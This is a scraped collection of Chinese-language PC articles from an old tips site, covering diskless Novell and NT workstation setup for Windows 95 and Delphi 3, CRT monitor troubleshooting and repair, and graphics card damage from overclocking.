    4.运行syscon程序，建立25个工作站用户w01～w25，建立一个组win95，其成员是25个用户。
    5.在sys:卷F:\下增建子目录DOS，并将DOS 6.22系统盘中包括command.com的所有文件拷贝到F:\dos下，用flag命令将它们设为共享S。然后退网，关机。
    6.打开各工作站的机箱，将远程引导芯片Boot Rom 妥善插到每台网卡上，服务器的网卡不要插此芯片。
    对于有跳线的网卡，则设置跳线位置为：
    IRQ=3，I/O Port=300，内存地址为c800；且Boot Rom 的跳线设为Enable (允许）。
    对于PCI型的无跳线网卡，则用所带的驱动程序软盘，运行mode程序，选J，即无跳线型。
    运行setup程序，设定网卡的IRQ、I/O Port 和内存地址如上述值。
    若是服务器的网卡与工作站的网卡相同，则两者的设置值应完全一样。若服务器的网卡为32位的，设置的值可与工作站的不一样。
    7.用原工作站启动软盘启动主工作站，以超级用户入网，用软盘运行wsgen.exe ，生成IPX.COM文件。
    8.新做一张带MS－DOS 6.22系统的DOS工作站启动软盘
    A:\含有command.com 文件。
    建立\dos和\net子目录，将MS－DOS 6.22系统的himem.sys、emm386.exe拷入A:\dos，将netx.com 和生成的ipx.com 拷入A:\net 子目录。
    建立autoexec.bat 文件，内容是：
    @echo off
    cd\net
    lh ipx
    lh netx
    set comspec=f:\dos\command.com /p
    f:
    login
    建立config.sys, 内容是：
    files=30
    buffers=30
    device=\dos\himem.sys
    device=\dos\emm386.exe ram
    dos=high,umb
    试用该软盘启动主工作站，验证启动入网、退出均应正常。
    9.生成A:盘引导映像文件net＄dos.sys，用于无盘启动工作站
    插入新做的引导软盘到主工作站A:驱，启动机子，以超级用户入网。在F:\system下键入：
    dosgen
    回车，则在此目录下生成net＄dos.sys 映像文件。
    将它及A:\autoexec.bat 两个文件拷贝到F:\LOGIN 下，并赋予共享属性S。
    10.然后取出软盘，检查每台工作站在无硬盘、无软驱的情况下能否正常启动入网或退出。
    三、拷贝Windows95系统文件
    启动Windows95教师机，以超级用户入网。将中文Windows95网络版光碟放入光驱中，设光驱盘符为E:，进入E:\admin\nettools\netsetup, 运行netsetup.exe。
    在弹出的“基于服务器的安装”对话框中，用鼠标左击“设置路径”，输入服务器路径：
    \\fs\win\windows
    指将Windows95系统文件安装到服务器win:\windows目录中。
    点“确定”，点“安装”。在弹出的对话框中，选择“服务器”项，键入Windows95 文件所在路径：
     E:\win95，点“确定”，在出现的对话框中选“不创建默认值”，输入产品标识码，即开始复制文件。等候片刻，将显示拷贝三次，并自动赋予所有文件为只读属性。结束后，退出netsetup程序。
    四、修改msbatch.inf文件
    接着，双击“网上邻居”，删除win:\windows\msbatch.inf 文件的“只读”属性，运行E:\admin\nettools\netsetup\batch.exe。
    出现设置对话框，输入你的名字、公司名、计算机名、组名，再进行以下几项重要设置：
    1.单击“Network Options”，弹出对话框，
    在Available Protocols中，
    去掉NetBEUI, 选IPX/SPX Compatible Protocol，Frame Type:802.3
    在Available Clients 项中，
    选Client for Netware Networks，Preferred Server: FS
    在Available Services 项中，
    选File and Print Sharing for Netware Networks
    选Enable Server_based Setup，并选中“Remote Boot”。
    2.单击“Installation Options”，弹出对话框，
    去掉Auto－answer'No to all'to version conflict dialogs 复选框。
    Type of Installation: 选“custom”。
    Installation Directory: 键入
    G:\home\w11(w11为第一台准备安装Windows95的主工作站）
    3.单击“Set”按钮，选中以下两项：
    Stop during setup at the following:
    Every page (allow customization of all setings)
    检查一遍设置无误后，点击“OK”按钮两次，再点击“Done”；在弹出“另存为”对话框中，输入： 　　\\fs\win\windows\msbatch.inf
    点击“确定”，存盘覆盖原文件，选“是”。
    回到“网络邻居”，将此文件改回“只读”属性。

返回


在NT网无盘工作站上安装Delphi

《一键清理系统垃圾》

在NT网无盘工作站上安装Delphi

      在NT网或Novell网无盘工作站安装Win 95是近来较热门的话题，许多报刊杂志都有这方面的文章介绍，在这里我们想谈谈在NT网的Win 95无盘工作站上如何安装Delphi 3。
    一般情况下，在Win 95无盘工作站上安装应用软件和在一般的机器上安装没有多大分别。在一台无盘的Win 95工作站以Administrator身份登录，然后按照一般的安装软件的方法将软件安装到服务器的共享目录中即可。按此法，我们已成功地安装了Office 97等软件。但在安装和使用Delphi 3时却遇到了一些障碍，经过调整后才得以使用。
    为了安装方便，我们将Delphi 3(标准版)的安装程序的所有内容拷贝到服务器的C盘Delphi3s目录中，并将此目录设定为共享，然后在一台Win 95无盘工作站执行Delphi 3的安装程序setup.exe,按照提示将系统安装到F:\Borland（F：是服务器D:\Win95s目录映射的网络驱动器)。安装完后出现提示：“立即重启系统”还是“稍后重启系统”，选择“稍后重启系统”并运行Delphi 3，能够正常运行。注意此时不能选择立即重启，而要先运行Delphi 3，如果选择“立即重启系统”，会破坏Win 95无盘工作站的引导系统，造成此Win 95工作站不能使用(我们曾先后在两台机器安装时选择了“立即重启系统”，结果系统无法使用)。
    现在在执行安装程序的这一台机器上可以运行Delphi 3了,但其它机器上运行Delphi时则出现了以下错误提示：
    Can′t load package f:\Borland\Delphi 3\Bin\dcltee30.dpl.
    找不到运行该程序所需的一个库文件。
    Do you want to attempt to load this package the next time a project is load.
    选择Yes后接着出现几个类似的错误提示，之后可以进入Delphi 3的编辑环境。随便在设计窗体上放置几个控件，按F9(RUN)运行，但程序不能运行，并出现错误提示：
    Fatal Error:F:\Borland\Delphi 3\Bin\Project1.drp(1):File not found:′system.pas′
    打开注册表，发现在HKEY—CURRENT—USER\SOFTWARE\Borland这一分支的内容与执行Delphi安装程序的那台机器的不一样，而且在HKEY—LOCAL—MACHINE\Software下没有Borland这一项（安装Delphi的那台机器有）。
    进行以下操作：打开安装Delphi的那台机器的注册表，分别选择HKEY—CURRENT—USER\Software\Borland和HKEY—LOCAL—MACHINE\Software\Borland，执行“导出注册表文件”，将这两个分支的内容导出到F:\，分别取名user.reg和machine.reg,然后分别打开每一无盘工作站的注册表，并执行“引入注册表文件”，将以上两个注册表文件分别引入。
    关闭注册表，退出后重启Windows并运行Delphi 3，此时不再出现前面所说的问题。
    现在还不能说Delphi可以放心使用了，在进入Database Desktop时出现了以下问题：
    Network initialization failed
    Diretory c:\
     File C:\PDOXUSRS.NET
     Cannot access network lock file
     Continue with network disable.Yes,no?
    选择“Yes”可以进入Database Desktop，而且还可以进行有关的操作，如建立表，但由Database Desktop建立的表，在我们自己编写的数据库应用程序中无法打开。
    从提示中可以看出，网络初始化时失败，初始化文件出现在C盘，但无盘工作站中并没有C盘，所以我们尝试修改其初始化文件存放的路径：执行Delphi系统中的文件BDEAdmin.exe，选择Configuration页标，点击Drivers前的＋号，再点Native前的＋号，选择PARADOX,将NET DIR的值“C:\”改为“G:\win95xx\config”(这里的win95xx是指某一工作站的计算机名，对应于服务器中的一个文件夹，config是其中的一个子文件夹，xx是某一工作站的编号）。因为BDEAdmin中设置的内容保存在F:\Borland\Common Files\BDE\IDAPI32.CFG中（其实，Database Desktop中的设置内容也保存在此文件），而每一工作站的设置都不同，所以要指定每一工作站的IDAPI32.CFG的存放路径。打开注册表，选择HKEY—LOCAL—MACHINE\SOFTWARE\BORLAND\Database Engine下的主键CONFIGFILE01，其原来的值为“F:\Borland\Common Files\BDE\IDAPI32.CFG”，将其改为：“G:\WIN95XX\CONFIG\IDAPI32.CFG”。同样，每一工作站都要进行这两步的操作。
    做完这些工作后，错误消失。
    但是当某一工作站中打开Database Desktop后，另一工作站再打开Database Desktop时又出现了错误：
    Could not initialIze BDE
    Directory is locked!（不能初始化BDE，目录被锁）
    按“确定”之后便退出，不能进入Database Desktop。
    从错误信息看，这应该是各工作站在打开Database Desktop时对BDE进行初始化使用的是相同的目录，所以当某一工作站占用了这一目录后，其它工作站在启动Database Desktop时便不能使用这一目录。因此尝试改变其初始化目录。再次打开每一无盘工作站的注册表，找到HKEY—CURRENT—USER\SOFTWARE\Borland\DBD\7.0\Configuration下的PrivDir和WorkDir，将它们的值都改为“g:\win95xx\personal”（personal是一子文件夹）。
    经过上述一番调整，Delphi 3及其数据库操作在我们的NT网Win 95无盘工作站中终于能够正常地使用了。
    网络及机器配置如下：
    服务器：Pentium II 400 CPU、128MB RAM、6.4GB硬盘、Window NT 4.0 Server；
    工作站：AMD K6－2 266 CPU、16MB RAM, Pwin95

返回


无盘网络

《一键清理系统垃圾》

返回总目录

无盘网络

◎Novell 4.11无盘Win95/98安装捷径
◎Novell无盘Windows95
◎NT4.0无盘工作站用户管理
◎NT Server无盘站配置技术详解
◎NT网的无盘工作站远程登陆
◎NT无盘站的软件安装
◎Win 95无盘站调试中问题的解决
◎WINDOWS NT无盘ＤOS6.22工作站的安装
◎WINDOWS NT无盘工作站技术
◎安装 Linux 无盘工作站
◎创建100M无盘站
◎多媒体无盘站巧实现
◎快速安装Windows 95无盘工作站
◎让无盘工作站进入不同的工作目录
◎如何在NT40上安装无盘工作站
◎无盘工作站上安装浏览器
◎无盘工作站实现Windows资源共享
◎无盘网络——历史还是未来
◎无盘终结者—案例
◎无盘终结者—初级
◎无盘终结者—进阶
◎无盘终结者—软件
◎五问NT无盘网
◎系统软件在无盘工作站上的应用
◎在novell无盘windows95实战
◎在NT网络中使用DOS无盘站
◎在NT网无盘工作站上安装Delphi
◎怎样在无盘WIN95网络中安装WPS2000、UCDOS和五笔输入法

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


CRT常见故障问答

《一键清理系统垃圾》

返回总目录 目录页 下一页

CRT常见故障问答

    对于计算机用户来讲，最亲近的莫过于显示器了，可以说它是计算机系统不可或缺的组成部分。目前大家常用的还是CRT显示器，而CRT显示器也极易出现故障，那么如何才能检查和排除这些故障呢？以下就为大家介绍了一些显示器常见故障解答，希望能对大家使用好电脑有所帮助。

    问：出现黑屏故障应如何排除？

    答：计算机显示器出现黑屏是用户在使用计算机中经常遇到的问题。其实，只要稍对计算机硬件中主板、CPU、内存、显示卡等几大部件有一定的了解，非元器件的损坏的简单故障完全可以自己动手排除。出现这种情况，你可以按照以下的维修步骤和方法进行分析和简单的维修：

    1．检查主机电源是否工作；电源风扇是否转动？用手移到主机机箱背部的开关电源的出风口，感觉有风吹出则电源正常，无风则是电源故障：主机电源开关开启瞬间键盘的三个指示灯(NumLock、CapsLock、ScrollLock)是否闪亮一下？是，则电源正常；主机面板电源指示灯、硬盘指示灯是否亮？亮，则电源正常。因为电源不正常或主板不加电，显示器没有收到数据信号，显然不会显示。

    2．检查显示器是否加电；显示器的电源开关是否已经开启？显示器的电源指示灯是否亮？显示器的亮度电位器是否关到最小？显示器的高压电路是否正常？用手移动到显示器屏幕是否有“咝咝”声音、手背汗毛是否竖立？

    3．检查显示卡与显示器信号线接触是否良好。

    可以拔下插头检查一下，D形插口中是否有弯曲、断针、有大量污垢，这是许多用户经常遇到的问题。在连接D形插口时，由于用力不均匀，或忘记拧紧插口固定螺丝，使插口接触不良，或因安装方法不当用力过大使D形插口内断针或弯曲，以致接触不良等。

    4．打开机箱检查显示卡是否安装正确；与主板插槽是否接触良好。

    显示卡或插槽是否因使用时间太长而积尘太多，以至造成接触不良；显示卡上的芯片是否有烧焦、开裂的痕迹；因显示卡导致黑屏时，计算机开机自检时会有一短四长的“嘀嘀”声提示。安装显示卡时，要用手握住显示卡上半部分，均匀用力插入槽中，使显示卡的固定螺丝口与主机箱的螺丝口吻合，未插入时不要强行固定，以免造成显卡扭曲。如果确认安装正确，可以取下显示卡用酒精棉球擦一下插脚或者换一个插槽安装。如果还不行，换一块好的显卡试一下。

    5．检查其他的板卡(包括声卡、解压卡、视频捕捉卡)与主板的插槽接触是否良好。

    注意检查硬盘的数据线、电源线接法是否正确？更换其他板卡的插槽，清洁插脚。这一点许多人往往容易忽视。一般认为，计算机黑屏是显示器部分出问题，与其他设备无关。实际上，因声卡等设备的安装不正确，导致系统初始化难以完成，特别是硬盘的数据线、电源线插错，也容易造成无显示的故障。

    6．检查内存条与主板的接触是否良好，内存条的质量是否过硬。

    把内存条重新插拔一次，或者更换新的内存条。如果内存条出现问题，计算机在启动时，会有连续四声的“嘀嘀”声。

    7．检查CPU与主板的接触是否良好。

    因搬动或其他因素，使CPU与插座接触不良。用手按一下CPU或取下CPU重新安装。由于CPU是主机的发热大件，Socket 7型有可能造成主板弯曲、变形，可在CPU插座主板底层垫平主板。

    8．检查主板的总线频率、系统频率、DIMM跳线是否正确。

    对照主板说明书，逐一检查各个跳线，顺序为“系统频率跳 CPU主频跳线——DIMM频率跳线“，设置CPU电压跳线时要小心，不应设得太高。这一步对于一些组装机或喜欢超频的用户有很大用处。

    9．检查参数设置检查CMOS参数设置是否正确，系统软件设置是否正确。检查显卡与主板的兼容性是否良好。最好查一下资料进行设置。

    10．检查环境因素是否正常。

    是否电压不稳定，或温度过高等，除了按上述步骤进行检查外，还可以根据计算机的工作状况来快速定位，如在开启主机电源后，可听见计算机自检完成，如果硬盘指示灯不停地闪烁，则应在第二步至第四步检查。

    上述的检查方法基于显示器本身无电气故障，即开启主机电源后显示器的电源指示灯不亮。若以上步骤均逐一检查，显示器仍不显示，则很可能属于电路故障，应请专业人员维修。

  3．检查显示卡与显示器信号线接触是否良好。

    可以拔下插头检查一下，D形插口中是否有弯曲、断针、有大量污垢，这是许多用户经常遇到的问题。在连接D形插口时，由于用力不均匀，或忘记拧紧插口固定螺丝，使插口接触不良，或因安装方法不当用力过大使D形插口内断针或弯曲，以致接触不良等。

4．打开机箱检查显示卡是否安装正确；与主板插槽是否接触良好。

    显示卡或插槽是否因使用时间太长而积尘太多，以至造成接触不良；显示卡上的芯片是否有烧焦、开裂的痕迹；因显示卡导致黑屏时，计算机开机自检时会有一短四长的“嘀嘀”声提示。安装显示卡时，要用手握住显示卡上半部分，均匀用力插入槽中，使显示卡的固定螺丝口与主机箱的螺丝口吻合，未插入时不要强行固定，以免造成显卡扭曲。如果确认安装正确，可以取下显示卡用酒精棉球擦一下插脚或者换一个插槽安装。如果还不行，换一块好的显卡试一下。

    5．检查其他的板卡(包括声卡、解压卡、视频捕捉卡)与主板的插槽接触是否良好。

    注意检查硬盘的数据线、电源线接法是否正确？更换其他板卡的插槽，清洁插脚。这一点许多人往往容易忽视。一般认为，计算机黑屏是显示器部分出问题，与其他设备无关。实际上，因声卡等设备的安装不正确，导致系统初始化难以完成，特别是硬盘的数据线、电源线插错，也容易造成无显示的故障。

    6．检查内存条与主板的接触是否良好，内存条的质量是否过硬。

    把内存条重新插拔一次，或者更换新的内存条。如果内存条出现问题，计算机在启动时，会有连续四声的“嘀嘀”声。

    7．检查CPU与主板的接触是否良好。

    因搬动或其他因素，使CPU与插座接触不良。用手按一下CPU或取下CPU重新安装。由于CPU是主机的发热大件，Socket 7型有可能造成主板弯曲、变形，可在CPU插座主板底层垫平主板。

    8．检查主板的总线频率、系统频率、DIMM跳线是否正确。

    对照主板说明书，逐一检查各个跳线，顺序为“系统频率跳 CPU主频跳线——DIMM频率跳线“，设置CPU电压跳线时要小心，不应设得太高。这一步对于一些组装机或喜欢超频的用户有很大用处。

    9．检查参数设置检查CMOS参数设置是否正确，系统软件设置是否正确。检查显卡与主板的兼容性是否良好。最好查一下资料进行设置。

    10．检查环境因素是否正常。

    是否电压不稳定，或温度过高等，除了按上述步骤进行检查外，还可以根据计算机的工作状况来快速定位，如在开启主机电源后，可听见计算机自检完成，如果硬盘指示灯不停地闪烁，则应在第二步至第四步检查。

    上述的检查方法基于显示器本身无电气故障，即开启主机电源后显示器的电源指示灯不亮。若以上步骤均逐一检查，显示器仍不显示，则很可能属于电路故障，应请专业人员维修。


不拆机也可以维修CRT显示器

《一键清理系统垃圾》

不拆机也可以维修CRT显示器

    你的显示器是否还闪得让你睁不开眼？是不是还动不动闹点小毛病？不用担心，有些故障是不需要大动干戈的，只要我们略施小技就能够让它服服帖帖地为你服务。

    显示器闪得让你睁开眼睛，不用担心，调一下刷新率吧！咦，为啥不能调整呢？刷新率总在60Hz，难道是显卡坏了吗？不是，一般出现此类故障可能是由几个原因造成的。

    第一、显示器的驱动没装对。显示器还需要驱动吗？当然，如果不安装显示器的驱动程序或在Windiws 98的系统中没有它预设的驱动程序，那么系统就会在我们显示器的刷新率一项设为默认或优化。但此时就只能按照最低的显示刷新率进行显示了。如何处理呢？只要我们在桌面上点鼠标右键→“属性”→“设置”→“监视器”→“更改”，安装正确的显示器驱动程序就行了。如果没有也不要紧，只要挑选一个你所知道的带宽较高的显示器型号，进行强行安装也可以调出调整刷新频率的菜单。但是不要太贪心哦，如果强行设置超过了你显示器所能承受的范围，它可要罢工了。

    第二、主要是局部闪动很厉害。这最有可能是显示器的周围存在功率较大的电器，如洗衣机、微波炉、电磁炉、电冰箱、空调器等。特别是变频空调，如果生产厂家为了降低成本，没有采取良好的抗干扰电路，就会造成变频空调在工作时向周围空间和沿电源线向外发射大量的电磁波，造成对显示器和电视机的图像干扰。遇到这种情况，可以用排除法从近到远将有可能造成干扰的电器移动出去。如果故障显示得比较特殊，基本可以确定是什么产品造成的干扰源。比如，图像上有明显的水纹状的滚动条，不停地从上向下移动，这种情况一般是50Hz交流磁场干扰，请检查显示器周围是否有大电流的供电线路，或者电动机、电焊机等工业设备。

    如果显示器出现一个“大花脸”——花屏，先别着急，未必是硬件的故障，这有可能是硬件驱动程序的问题。你会说我的显卡一直用得好好的，为什么会出现这样的现象呢？实际上这未必是你的显卡驱动引起的，有可能是其他的驱动程序或者应用程序影响所致。考虑一下自己最近装了什么新的硬件或者软件吧！先将它们卸载了试一试。

    当然，显示器的花脸也会有不同的表现形式，不可能什么样子都可以用驱动程序的方法排除。比如，显示器的图像中间有明显的一块暗斑，这有可能是地磁影响，我们可以试着变换显示器的朝向来解决。如果是在使用过程中突然出现的，大多是因为无意中显示器被磁化所致，只需要进行手动消磁就可以解决。一般来说，因为目前的技术原因，大多数CRT显示器的底色都不会很纯，或多或少会有颜色不匀的现象，只要这种情况不影响正常的使用，都不算是问题。如果显示器的图像总是红一块、蓝一块，左右摇摇显示器就没有了，这种情况也是属于磁化，最好检查一下显示器周围有没有放手机、收音机、音箱等磁性物体。如果显示器上的文字和图像有规律地在清晰和模糊之间变化，图像有明显的网纹出现，屏幕上的文字发虚，那么可以调节OSD菜单中的摩尔纹选项来解决。


菜鸟修显示器一例

《一键清理系统垃圾》

菜鸟修显示器一例

《中国电脑教育报》柳兆斌

    凭着对显示器原理的一点点了解，再加上多观察，多动脑，就能让一个问题显示器变废为宝，这其中的成就感是十足的。

    近日，朋友的一台电脑出问题了，症状是开机正常运行时，显示器突然变红，替换主机后，问题依旧。排除了主机和软件出错的可能，那问题肯定是显示器了。由于这是1997年买的显示器，再加上最近搬运频繁，所以怀疑是某个元件老化或是虚焊造成。于是小心地打开后盖，仔细观察电路板，发现尾板上的一个三极管锈迹斑斑。拿出万用表，但又不会测，怎么办呢？突然发现在旁边还有相同的三极管，于是先测出那个三极管各个焊点的状态和阻值，再测出疑点三极管的阻值，然后进行对比，果然结果不同。疑点三极管的两端阻值为零，也就说是通路，而用于比较的三极管为有阻值。再找个参照物，于是找出第三个相似的三极管测一下，结果也为有阻值。看来问题就是这个三极管了。于是借助电烙铁把它焊下来，又找到一个相同的三极管按原来样子焊上。焊时要胆大心细，千万不要碰到别的元件。焊好后，盖上机壳，怀着无比激动的心情按开电源，哈哈，症状竟然消失了。在朋友羡慕的目光中拧上螺丝，嘴里说着小菜一碟，还装做满脸不在乎的样子，其实心里的高兴劲儿，只有自己知道了。

    朋友，只要胆大心细，多观察，多动脑，相信小小的故障你也能解决的。


常见彩色显示器故障维修

《一键清理系统垃圾》

常见彩色显示器故障维修

    如今电脑DIY高手摆弄起电脑主机来可以说是轻车熟路，没有丝毫的畏惧。但是显示器如果有问题，我相信大多数人会望而却步。这是因为显示器的维修既需要电子技术的专业知识，又需要显示器维修的经验，否则轻者会造成故障面扩大，重者会对人身安全造成威胁。这么说来是不是我们完全不能自己动手维修呢？其实不是这样，笔者认为一些常见的显示器故障是完全能够自己动手排除的，大家如果有兴趣的话，请准备电烙铁、吸锡器、指针式万用电表以及其它一些常用工具，让我们一起来学一些显示器的维修知识吧！
    预备知识：大家现在用的显示器绝大多数都是采用的阴极射线管显示器（也就是平常所说的CRT）。我这里讲的也是这种显示器的维修。
    显示器的电路结构基本上可以分为以下几个部分：开关电源部分、行场扫描部分、通道部分以及控制电路部分。显示器容易出问题的部分主要有开关电源和行场扫描部分，因为这两个部分工作在大电流高电压的状态，比较容易出问题。我们这里不要求大家去深入了解其工作原理，只要求大家能知道有这么几个大的部分就可以了。大家在动手之前，一定要先做好安全准备：首先是拆开机盖和焊接前先要断开电源；二是不该碰的东西绝对不要碰，因为即使在断电的情况下，显示器内部有的地方仍然带有残余高、中压，虽然不足以致命，一旦被击，却足以让你刻骨铭心再也不敢碰；三是要注意保护机器，如显像管接地线绝对不能脱开，否则一旦开机，等待你的将可能是灾难。下面我们就从具体的现象入手来谈怎样处理一些常见的故障吧！
    故障现象：图像一直模糊，或者一开机就模糊，需要等十几至三十分钟后图像才逐渐清晰。故障原因：机器受潮漏电导致聚焦极电压跌落。
    处理方法：有的人用加热烘干法或调聚焦极电压的方法来对付这种故障。它虽能应付当时，但是治标不治本。其实根治故障的方法很简单，我们只要更换掉显像管管座就会万事大吉。方法是断电后将显像管尾部电路板小心向后拔出，千万不要左右摇晃，以免折断显像管尾部的抽气封口而造成显像管报废。用电烙铁和吸锡器拆下那个连接显像管的白色管座，更换一只新的同类管座即可。开机如果觉得图像还不够清楚，可以微调行输出变压器上的聚焦旋钮直至图像清晰为止（行输出变压器的具体位置在主电路板上，是那个黑色的、体积最大的、如拳头大小的东西。它上面还拖着一根粗粗的橡皮线，上面有两个旋钮，靠上面的一个一般是聚焦电压调节旋钮，靠下面的一个是加速极电压调节旋钮。这两个旋钮一般不要动，特别是加速极旋钮不要动，否则会影响显像管的工作状态，即使要调节，也要在调节前标记它们的原始位置，以备还原）。
    故障现象：有“噼哩叭啦”的放电声，且图像大小随之变化，图像上还夹杂有不规则的干扰横条。
    故障原因：显像管受潮造成阳极高压对地放电。须及时处理，否则会造成故障面扩大。
    处理方法：在处理本故障前，我们先认识一下阳极帽。它是显像管锥体上的一个橡皮帽，还拖着一根连到行输出变压器的粗线。阳极帽内部正常工作时有接近20KV的高压（电压视不同屏幕尺寸而异，屏幕尺寸越大，电压越高）。一般情况下我们绝对不能碰它！现在的故障，就需要我们来对付它了，怎样才能保证我们的安全呢？
    首先要断开电源，断开电源后我们还需要对阳极高压进行放电，因为在断电后仍然有1万伏～2万伏的高压残存于阳极里，只有放完电后，我们才能进行下面的操作。一般专业工作者有专用的放电器，在业余条件下如何放电呢？办法是请大家拿出前面准备的指针式万用电表（不要用数字万用表，因为高压静电极有可能损坏数字表里的集成电路），挡位拨到直流电压挡的最大挡位上，黑表笔接地（如果不知道哪里是地，可以找到显像管锥体上面的黑色部分，看到紧绷在黑色部分上的那根银色的金属编织线了吗？对，把黑表笔与这根线紧密接触，然后将红表笔伸进高压帽中（我们的手不要触碰任何金属部分），如果听到“噼叭”响声，证明高压在放电，我们再把红表笔从其它方向上伸进阳极帽，直到听不到响声为止。这时我们才能相信的确没有高压了，抽出表笔，用手翻开阳极帽，用尖嘴钳伸到阳极帽下面夹住卡簧，拆下阳极帽，先看一下阳极帽上面是否有因电击而形成的浅沟，如果有的话，必须更换阳极帽。
    如果没有的话，就只有用纯酒精（浓度为99％以上，最好是化学纯或分析纯级的，实在没有的话，用医用95％的酒精也可以，不过晾放的时间要长一些。这里说的医用酒精不是指消毒用的那种掺了蒸馏水的含量为75％的那种酒精，千万注意哦！）将橡皮帽擦洗干净，如果卡簧生锈的话，最好更换，万一没有卡簧换，用小刀除一下锈也可以。显像管锥体部分，先用软布或者纸把灰去除干净，再用脱脂棉蘸纯酒精将阳极内以及阳极周围一直到石墨层为止的部分反复擦洗干净。不要留有丝毫的附着物，然后充分晾干，最后安上阳极帽，显示器就会重获新生了。
    故障现象：显示器屏幕四周颜色发生变化，只有中间颜色正常，或者是只有某个角的颜色发生变化。
    故障原因及处理方法：这种现象有几种可能性：
    第一个可能是因为显示器被摔或外部原因引起显示器的磁化，这种情况只需要停机几分钟再开机自动消磁即可。有的显示器是手动消磁，只要按一下消磁键，听到显示器里面继电器的“咔嗒”响声后就行了，如果这样还不能消磁的话，就只能用外部人工消磁的方法来消磁了，方法是把消磁器接通电源，然后缓缓移近屏幕表面，从中心向四周作旋转运动，直至异色消失，再慢慢移开显示器屏幕表面，最后才能断开电源。不过有时候因为显示器被严重摔伤后，因屏幕里面的钢阴罩产生不可恢复的变形，这是任何消磁办法都无效的，只能更换显像管。有的人可能一下找不到机外消磁器，我这里教大家一个自制的方法：可以找一个触点容量40A以上，电压为220V的交流接触器（只要是线圈未损坏就可以），拆下线圈和一个“E”形铁芯，“E”形铁芯上的短路环拆下来，将铁芯插入线圈，线圈两极接上带插头的电源线，处理好绝缘后便做好了。不过要记住：使用时，时间要短，同时，使用的消磁面是“E”字形的右边，可不要搞错了，绝对禁止不插铁芯使用，否则会引起严重的后果。
    第二个可能是因为显示器里的消磁电路出了问题，如果是手动消磁的显示器，可以按一下消磁键，听到“咔嗒”的响声，屏幕却不抖动，说明极有可能是消磁电阻损坏，如果没有响声则可能继电器及其控制电路有问题；如果是自动消磁的显示器，每天开机时屏幕上都有异色，很可能是消磁电阻损坏。由于消磁电阻损坏所引起的异色故障很常见，这里就给大家谈一下更换消磁电阻的方法。
    一般情况下，消磁电阻紧挨着消磁线圈的插头，大家可以先找到消磁线圈。消磁线圈位于显像管锥体的根部，是一个黑色的长方形线圈，该线圈下部的引出线在主电路板上有一个插座，我们就在插座附近找消磁电阻。消磁电阻一般是黑色的长方体酚醛树脂（电木），有两个或三个引脚，里面有一个或两个热敏电阻，有的热敏电阻外形是黄色的片状体，它有两个引脚，就像一个大的圆形高压瓷片电容。损坏原因一般是电阻体变值或电阻体破碎。此外，确认的方法还可以看电路板上所印的符号，大家最好是找内行来确认一下。确认了热敏电阻后，先不忙拆下来，先仔细看一下它的两个（或三个）引脚周围的焊锡是否有裂纹，如果有的话，你可能不需要更换热敏电阻，只须用锡和电烙铁将其补焊好即可，如果焊后仍然不行的话，那就拆下热敏电阻，先在耳朵边摇一下，如果听到“哗啦”的响声，说明电阻体破碎，如果没有响声，可以用万用电表的“×1Ω”挡测一下电阻值，一般电阻值在18Ω～27Ω之间，如果不在这个范围内，则说明热敏电阻已坏。这时，大家只需要更换一只同型号的热敏电阻即可。不过请大家注意，刚换上去时，可能不能一下子消除异色，只要关机后，间隔几分钟，再重新开机或是间隔几分钟后，按手动消磁键的方法就可以解决异色问题。
    故障现象：（电调显示器）个别按键不起作用，其它按键正常。
    故障原因：按键损坏。
    处理方法：更换同样的按键即可。由于方法较简单，这里就不多说了，不过要提醒一句：依笔者经验，按键损坏有很多原因并不是我们按坏的，而是一种我们大家都没有引起注意的东西：烟雾，不管是香烟烟雾还是煤烟，都是电气元件的大敌。它们所含的硫化物之类的气体会加速电气元件特别是含铜元件的腐蚀，如果大家要爱惜自己的电脑，就应该让电脑远离香烟和煤炉。


超频引起显卡损坏一例

《一键清理系统垃圾》

超频引起显卡损坏一例

一天有个朋友跑来找我，说他的机器显示不正常了。我去一看，满屏都是乱字符，桌面墙纸也有破碎感，机器启动自检时显示也不正常。后来拿到商家那里，发现是显卡坏了，更换后问题解决。问题到此，本已告结束，可让我疑惑的是，他才买三个月的丽台TNT2 PRO显卡质量应该不错啊，怎么会出问题呢？
    经过一番研究才发现，坏就坏在超频上。
    我们常说的CPU频率是CPU的主频，它等于CPU的外频乘以倍频。从奔腾166 MMX开始，INTEL就将CPU的倍频锁死，而AMD公司也从K7系列开始将其生产的CPU倍频锁死。这样，如果我们想超频的话，就只能从CPU的外频着手。根据技术规范，目前CPU的标准外频有66MHz、100MHz、133MHz三种；AMD的K7系列所宣称的200MHz、266MHz其实是指CPU与北桥芯片间交换数据的频率，其实际外频仍然是100MHz或133MHz。而AGP显卡所用的APG总线的标准频率是66MHz，PCI卡以及IDE驱动器所用PCI总线的标准频率则是33MHz，它们工作时与CPU标准外频间的关系如下表所示：（^20030801a^）
    当CPU工作在非标准外频下，比如75MHz、83MHz、112MHz时，有些主板提供了硬跳线或者BIOS设置，让用户自己手动决定AGP的工作频率与外频的关系是1/1、2/3还是1/2分频，从而让电脑能稳定地工作。比如华硕的P2B-F主板提供了一组跳线，可以让用户自己决定AGP显卡的频率。梅捷的6BA+主板则是在BIOS里面设置。这里需要提一下的是，某些改进型BX主板虽然提供了PCI4分频以及所谓的133MHz甚至133MHz以上的外频，并且可以支持FC-PGA封装方式的新奔3和赛扬CPU，但由于BX芯片出道较早，只能提供66MHz和100MHz两种标准外频，其AGP显卡最多支持2/3分频。也就是说，当工作在BX的CPU外频超过100MHz时，AGP显卡已经在开始超频使用了，尤其是在使用133MHz外频的PⅢ CPU时，极有可能会出问题，长时间这样使用的话，很多显卡会因此而损坏。
    很不幸的是，大多数主板（甚至包括一些号称可以“线性超频”的主板），并没有提供上面所说的那种手动分频功能。通常情况下，它们是自动设置的，比如，只有当外频达到100MHz时，AGP显卡才能以2/3分频运行；在100MHz以下时，即使是以99MHz的外频工作，AGP显卡还是以1/1分频运行。这也就不难解释，某些CPU不能在83MHz等非标准外频下工作，反而能很稳定地工作在100MHz外频下的原因了：在83MHz外频下，APG显卡也许是以1/1分频方式工作在83MHz下，大大超过了其66MHz的标准频率；PCI卡和IDE驱动器的频率为83×1/2=41.5MHz，也超过了其33MHz的标准。只要其中有一种设备不能承受这样的频率，如杂牌显卡，网卡，集成声卡，兼容性差一点的硬盘，都会导致计算机不能正常工作。当处于100MHz外频时，由于其他设备都是在标准频率下工作，只要CPU有足够的能力，计算机反而会工作得更稳定。
